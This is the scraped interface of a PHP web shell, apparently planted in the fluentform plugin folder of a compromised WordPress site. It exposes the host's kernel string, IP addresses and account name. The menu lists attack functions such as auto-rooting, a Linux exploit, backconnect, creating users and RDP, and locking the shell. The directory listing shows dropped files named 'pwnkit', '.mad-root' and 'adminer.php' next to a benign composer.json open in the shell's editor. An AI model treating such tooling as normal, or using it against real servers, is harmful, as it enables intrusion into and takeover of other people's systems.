Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.16 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.4.33
dottorr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
dottorr /
www /
wp-content /
plugins /
fluentform /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
boot
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
composer.json
1.19
KB
-rw-r--r--
fluentform.php
952
B
-rw-r--r--
index.php
26
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
33.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "wpfluent/wpfluent", "type": "project", "description": "WPFluent - The best framework to build WordPress plugins.", "keywords": [ "WordPress", "framework", "WPFluent" ], "license": "MIT", "authors": [ { "name": "Sheikh Heera", "email": "heera.sheikh77@gmail.com" } ], "repositories": [ { "type": "vcs", "url": "https://github.com/wpfluent/framework" } ], "require": { "wpfluent/framework": "^1.0" }, "autoload": { "psr-4": { "FluentForm\\App\\": "app/", "FluentForm\\Framework\\": "vendor/wpfluent/framework/src/WPFluent" }, "classmap": [ "database/" ], "files": [] }, "extra": { "branch-alias": { "dev-master": "1.0.x-dev" }, "wpfluent": { "namespace": { "current": "FluentForm" } } }, "scripts": { "post-update-cmd": [ "FluentForm\\App\\ComposerScript::postUpdate" ] }, "minimum-stability": "dev", "prefer-stable": true }
Close